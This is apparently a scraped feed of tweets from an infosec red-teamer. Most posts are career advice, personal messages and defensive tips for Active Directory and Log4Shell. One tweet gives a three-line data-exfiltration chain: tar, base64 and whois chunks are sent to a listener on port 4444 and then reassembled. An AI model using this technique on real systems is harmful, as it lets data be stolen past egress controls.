If you have ever learned anything from me at all. I challenge you to pay it forward. I didnโt get to where I am by standing on the shoulders of giants, I got here by learning tidbits from hundreds of tweeters, bloggers, podcasters & presenters who chose to share their knowledge.
"I'm sorry to bother you, but your CPU is hotter than the surface of the sun. This may shorten your CPU's lifespan if this continues -- Windows 10" - (source: )
Dear %Companies%, A single security minded Sys Admin is worth more than a handful of pentesters. Please start investing in the admins you already have. I say this as a pentester who has seen the impact that an empowered admin can have.
I want to make something very clear to the
#infosec
community. Just because you aren't deeply technical, a pentester, a red teamer, a forensics expert, or RE wiz doesn't mean that you can't teach people things. Everyone's life experiences are different and the more we 1/4
First: ncat -k -l -p 4444 | tee files.b64 (tee to a file so you can make sure you have it)
Next: tar czf - /bin/* | base64 | xargs -I bits timeout 0.03 whois -h 192.168.80.107 -p 4444 bits
Finally: cat files.b64 | tr -d '\r\n' | base64 -d | tar zxv (to get the files out)
Just watched the lady in front of me at the DMV give a USB stick to the clerk and say that all of her proofs of ID were โdigitalโ. The clerk proceeded to plug in the USB and copy the files to his desktop, then open them. 1st) Iโm curious if she is in the job market. 2nd)
My kids and their friends are having a LAN party and they think Iโm totally weird for calling it that... but they are all playing the same game, on their own computers, in the same room in which most do not live. == LAN party yes?
Today I joined the
@BHinfoSecurity
security team! Super excited to join this League of Extraordinary Hackers. Thanks to everyone who reached out and sent DMs about positions.
Hey
@defcon
- what about T-shirts or Hoodies with these QR codes on them. One says "DO NOT TAKE PHOTOS AT DEF CON" the other says "I DO NOT CONSENT TO THIS PHOTO OR VIDEO". Which due to the camera apps auto reading QR codes should pop up this message if you happen to be in-frame.
Just tried this out and it works! Next time you get a vendor email, reply with this: (code here: ) with a subject line of "Mail Delivery Subsystem - Address Not Found" (make sure to clear out the "RE:" and other subject line :)
is back online. It's an egress testing tool that you can hit via UDP, HTTP, HTTPS, or SSH on any port via IPv6 or IPv4 and you will always get back `w00tw00t` for verifiable responses.
10
#Log4Shell
Facts vs Fiction: a ๐งต
1. 1.x is NOT vuln to this RCE. While it doesn't have another RCE, it requires access to send serialized data to a listener ON the log server. This is much MUCH harder to exploit and kind of rare for a Log4j server to be running.
One of my favorite interview questions is asking someone what they believe the top 10 security issues companies have today. You will know exactly how much experience, forethought, maturity, and technical skill someone has just from that one question.
To all looking into the SolarWinds Orion breach: Orion holds credentials, such as Domain Admin, Cisco/Router/SW root/enable creds, ESXi/vCenter Credentials, AWS/Azure/Cloud root API keys. and so much more. CONSIDER THESE CREDENTIALS COMPROMISED if you see other IOCs
#SunBurst
Today was my last day of work at Cruise :( . Iโm part of a lay-off :/ So yah... looking for work. I know the US is at a crazy unemployment rate and probably very few are hiring but if you know of anywhere looking to add to their internal red team, security trainer, SMB CTO/CISO/
If you run a CTF and one of your challenges is a zoomed out fuzzy picture of 4000 lines of Base64 in the Wing Dings font, you are a monster and should feel bad about yourself.
Your biggest obstacle in this world is yourself. Self doubt is beaten by ignoring it. Itโs dumb and useless. You are amazing and can do anything you let yourself achieve. I believe in you.
#infosec
career advice. If all you ever do is fight fires all day, the best you can ever hope to learn is to be more efficient at fighting fires. You will never learn new ways to fight fires. Always schedule time for yourself during your day to just learn.
#alwaysbelearning
My Metasploitable 3 CTF Start to Finish walk-through of all the challenges including CTF setup/prep, and alternative solutions: (Now downloadable/printable/copy allowed)
Cracking NetNTLMv1/v2 using NTLM hashes w/ Hashcat - this is epic! >
If you have a ton of NTLM hashes lying around, even if they aren't cracked, this could make them useable much quicker than trying to crack them to clear text.
The biggest career advice I can give anyone in Infosec is to document/brag about your successes. I feel safe in saying that any manager I have had would vouch for the fact that you have to usually pry it out of me. Which isnโt humble, itโs stupid. [1/2]
Posted my "Practical Cryptography for Infosec Noobs" slides for
@shmoocon
2022 here:
I know I went fast so here are all of the slides so that you can get each of the links and details.
Broadcom CEO telling VMware folks to return to the offices โor elseโ is not gonna end well. If you are a VMware shop, are yโall worried at all or just expecting to roll through?
Learned something new today. If you decrease the WiFi power so it doesnโt extend as far, magically your kids come out of their rooms in search of better signal...
#UnpopularOpinion
I don't believe that anyone's first career should be pentester or red teamer. Ethics, maturity, empathy and technical practice are all things I feel are base requirements for the job and aren't things you can have in your first few years of working in IT/Sec
Hi. Iโm hiring for my team. 3 spots open, not all of the requirements are requirements. Flexible on the Senior part too. What Iโm looking for is the stuff I canโt teach. Drive, empathy, and the ability to learn quickly and dig deep.
I feel that I am better at red teaming because I was a SOC Analyst, I was tech support, I was help desk, I was a sys admin. More than any college degree or certification, or technical knowledge I have, empathy and knowing how things work has made me a better tester.
If you haven't yet, as soon as possible run the following command on ALL of your AD CAs:
certutil.exe -setreg CA\AuditFilter 127
This will enable all of the logging you will need to catch many of the attacks detailed in
@harmj0y
@tifkin_
's awesome work
This is my friendly reminder that you are not alone and you are awesome. If you can see this then you have my permission to contact me to talk about whatever you need to, whenever you need to.
If you have LDAP servers inside your network, or trust external 3rd-party ones, and either of them allow the schema attributes javaClassName, javaCodeBase or javaSerializedObject as writable, you should be making sure attackers aren't using them for
#Log4j
#Log4Shell
A home lab is not a requirement to getting a job in Infosec. Spending money on something like that is an investment in you learning technical skills, but so is a cloud account with free credits and
@hackthebox_eu
and
@RealTryHackMe
and a hundred different resources. 1/2
Ladies and Gents, my life goal is to graduate from
@wgu
by the end of this year. To do that Iโm going on hiatus. No games, or social media. No streams or TV shows. The next post you see from me should only be two words. โIโm doneโ. See you soon.
One of the smallest changes with huge effect you can make to Active Directory to help secure it against a LOT of attack paths is changing the attribute ms-DS-MachineAccountQuota = 0. Do this now, do it on Monday, but adds a pretty decent barrier to many attack paths.
Please make sure to patch your Windows systems. CVE-2020-16938 is no joke. Hard Drive encryption does break this attack, however, most servers and virtual machines don't have HDD encryption enabled. Patch!
#ntdsdit
op:
@jonasLyk
Releasing a NFS Client today, it's written in Go, has file list, upload, download, delete, make directory and delete directory functions without having to mount the drive or permissions (locally) to do so. This can be super helpful from a Win host.
80% of pentest firms/redteams that I've been a part of don't have operational documentation even close to what was posted of the google translated Conti playbook. I'm part of that problem so lets all
#DoBetter
#BeBetter
#DocumentBetter
This is year 2 of holidays during a pandemic. My DMs are open and I am here if you just want to talk to someone and not feel alone. I am here if you need to scream and yell and tell someone that it hurts. I am here. You are not alone.
to be a hacker. My call to action is this; I would like to see more people submitting talks. Screw what CFP boards think of your talk. They make decisions based on what they want their conference to be, not how good your talk is. You are amazing & I want to hear every word.
#Love
Thanks for all the support, I will respond to messages. I had a 48 hour exam this weekend so I disconnected, focused on family, the exam and getting my head right. On a positive note; I passed the Red Team Operator exam! by
@zeropointsecltd
@_RastaMouse
Post-Pentest Depression is where you start doubting all of the things you did and slapping your self for all the mistakes you made, or things you forgot to check. Am I alone in this or anyone else get this?
Friendly reminder to not copy and paste random strings into a shell from the Internet and especially Twitter and ESPECIALLY on to production servers to โsearch for vulnerable Log4jโ
If you pentest, red team or defend windows environments, this should be required reading. Wish I was in the room when this talk was presented. Please
@hackinparis
release this video ASAP. :)
#IncidentResponse
challenge: Here is a spam email that made it through Google's spam filter. Which of the headers are actually real and which ones are fake? Can you spot the cool trick that this spammer is using?
Cool powershell trick I learned today: " gci C:\users\*\* " lets you know which user's home directories you have access to and whats in the first level.
Advanced Red Team EDR evasion technique:
1. Donโt run your malware on a box that is monitored by EDR.
2. Tunnel all of your other attacks through the box without EDR
3. Gain access to everything via weak IAM controls (Active Directory)
4. End engagement
Did I miss anything?
Dear Pentesters, don't be lazy/sloppy and leave files, registry keys, cron jobs everywhere. Do your best to clean up everything you put down.
#ZeroContextTweets
#DEFCON26
#BlackHat2018
#BSidesLV
advice: just because they are on stage or in front of the class doesnโt mean they know what they are talking about. Challenge everything, test it yourself. This however doesnโt give you the right to treat anyone as less than respectful. They 1/n
Anyone know a good way to help a neurotypical person understand executive disfunction? Just saying โitโs like you want to do something but you canโtโ isnโt really landing.
To all. If you ever find yourself in a situation at a conference or place Iโm at and need me to call you or pick you out of that situation. DM me for phone number so that you have it and can use it in that situation. I will show up.
To all of you working on
#log4j
today, a Friday, you are appreciated. You are awesome. Thank you for doing the work that needs to get done when it counts. Security is often a thankless job. So thank you for today.
Played a bit with
@CertSG
's FIR project (Fast Incident Response). Took me about 40 minutes to get set up and it's a fully functional Incident Response tracking platform w/ metrics! + right price: FREE ;-)
Today a student of mine couldnโt find the desktop of a user on the Windows XP box he exploited because it didnโt have a C:\Users directory. I felt sooooo oldโฆ
This is a blog post that ALL pentesters/red teamers should save in their favorite offline knowledge base (evernote, keep, wiki, etc). Do it now, future you will thank me.. or more correctly Damien King (the author). Seniors: go stuff this down your junior tester's throats ASAP
I have grown to love TMUX but it's ability to log console output is atrocious vs SCREEN. Here are my two setup guides for myself. Screen logs ALL sessions automatically, and even through the PIA setup for TMUX you still have to enable it every single time....
โItโs almost like people are making more money teaching hacking than actually doing it.โ --
@assume_breach
^ 100% true statement, and most don't teach good habits, they teach run and gun cowboy BS.
I wish certifications didn't have arbitrary expiration dates, but instead had big, bold "issued on" dates. That way certification companies couldn't milk you for "CPE"s (which for some reason you can "pay" for..) & hiring companies could see when you had that knowledge. Thoughts?
This tweet didn't age well. It was short sighted. For me, since people's decision to not get vaccinated has resulted in my father being hospitalized and my son possibly infected too... Go get the shot or stay home. Stop hurting other people. I'm tired. :(
I'm vaccinated. I think it's a good idea to do so and hope that others also get vaccinated. Obviously you can do what you wish, but whatever your decision is, I hope that you stay healthy and live a long life doing whatever you love doing for as long as possible.
If I was in charge of an entire companyโs security this first large projects I would focus on is (in no particular order)
- asset management (can you tell me what this IP on your network is and does within 10 minutes)
Dear CTF challenge creators. If I have to guess a password, URL, hostname etc and itโs not either in rockyou, dirbuster or other standard word list, you should confirm that itโs in fact guessable in a short period of time by having a friend attempt it.
If you are on a Blue Team, or IT Team, and you aren't running BloodHound REGULARLY, you are doing yourself a disservice. As a CTO I would either get rid of AD, or have BloodHound statistics be a top KPI/OKR for my org.
I never realized how strong the rainbow had become as a symbol. โbeen wearing a rainbow ๐ mask around recently in public & itโs been a small glimpse into the hate/disgust thrown at ๐ณ๏ธโโง๏ธ LGBTQ+ peeps. I now need LOTS more rainbow gear. Iโm all about making bigots uncomfortable :)
Would you like to be a Certified Checkbox Unchecker as well? Now it's easy to get your CCU certification, sign up here: - It's the same esteemed certification body I received mine from: (Takes about an hour to process)
haven't seen or done personally. There is a lot of bravado out there. Many people speak on popping shells & APT like they are experts, that aren't, but when you share experience, real experience, we all get better. Shared knowledge, infinite curiosity, this is what it means 3/4
*IT* *IS* *NOT* *โUSERSโ* *JOB* *TO* *KNOW* *SECURITY* *BEST* *PRACTICES*โฆ we all need to do better at earning our paychecks and make it so they can do their jobโs securely (the ones they are paid to do) without having to think about it.
#TheHillIllDieOn
You have my singular and undivided attention. You sent my son home on the day they were passing valentines around in class and he came home in tears... because your predudices made you think my Asian child had the corona virus. I hope you feel the vibrations of my rage.